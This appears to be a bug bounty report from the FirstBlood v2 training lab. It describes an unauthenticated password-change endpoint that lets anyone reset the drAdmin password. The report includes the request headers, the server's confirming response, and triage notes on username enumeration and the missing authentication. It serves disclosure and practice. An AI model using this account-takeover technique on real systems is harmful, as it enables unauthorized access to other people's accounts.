FirstBlood-#404Able to change any username's password without login (including drAdmin)
This issue was discovered on FirstBlood v2

On 2021-10-25, 0xconft Level 5 reported:

Hi there,

I found auth issue where this sensitive endpoint that can be used to change any user's password can be accessed by anyone without login

PoC. of changing drAdmin password Requests

POST /drpanel/drapi/editpassword.php HTTP/1.1
Content-Length: 16
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close



HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Oct 2021 16:46:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 34

Password updated - XkD5vyLSpChI6Hb

Now drAdmin passsword will be changed to "XkD5vyLSpChI6Hb"

Best Regards, 0xconft


Endpoint: /drpanel/drapi/editpassword.php

This report contains multiple vulnerabilities:

  • Auth issues
  • Auth issues

FirstBlood ID: 27
Vulnerability Type: Application/Business Logic

It is possible to edit the admins password (dradmin) from /drapi/editpassword as it's only looking for the username. Usernames can be enumerated when logging in as trying 'drAdmin' results in a different error. The username can also be found from FirstBlood v1.

FirstBlood ID: 28
Vulnerability Type: Auth issues

The endpoint /drapi/editpassword can actually be accessed unauthenticated.